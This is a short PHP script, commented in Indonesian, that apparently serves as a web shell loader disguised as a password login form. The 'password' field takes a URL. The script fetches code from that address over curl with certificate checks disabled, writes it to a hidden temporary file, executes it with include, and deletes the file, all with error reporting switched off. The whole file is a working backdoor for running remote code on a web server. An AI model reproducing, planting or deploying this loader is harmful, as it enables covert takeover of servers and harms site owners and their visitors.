<?php
session_start();
error_reporting(0);

// Simpan sementara payload link ke session
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
    $input = trim($_POST['password']);
    if (filter_var($input, FILTER_VALIDATE_URL)) {
        $_SESSION['remote_url'] = $input;
        header("Location: " . $_SERVER['PHP_SELF']); // refresh supaya gak re-post
        exit;
    } else {
        echo "<p style='color:red;'>Masukkan link valid (contoh: https://...)</p>";
    }
}

// Kalau udah login dan ada link tersimpan
if (isset($_SESSION['remote_url'])) {
    $url = $_SESSION['remote_url'];

    function fetchRemote($u) {
        if (!function_exists('curl_exec')) return false;
        $c = curl_init($u);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($c, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla');
        curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($c, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($c, CURLOPT_TIMEOUT, 10);
        curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
        return curl_exec($c);
    }

    $code = fetchRemote($url);
    if ($code && strpos($code, '<?php') !== false) {
        $temp = sys_get_temp_dir() . '/.' . md5($url) . '.php';
        file_put_contents($temp, $code);
        include $temp;
        unlink($temp);
        exit;
    } else {
        echo "<p style='color:red;'>Gagal ambil data dari link tersebut.</p>";
        unset($_SESSION['remote_url']);
    }
}
?>

<!-- Form login password sebagai link payload -->
<form method="post">
  <input type="text" name="password" placeholder="Input Ur Pass" style="width: 300px;">
  <button type="submit">Ara Ara</button>
</form>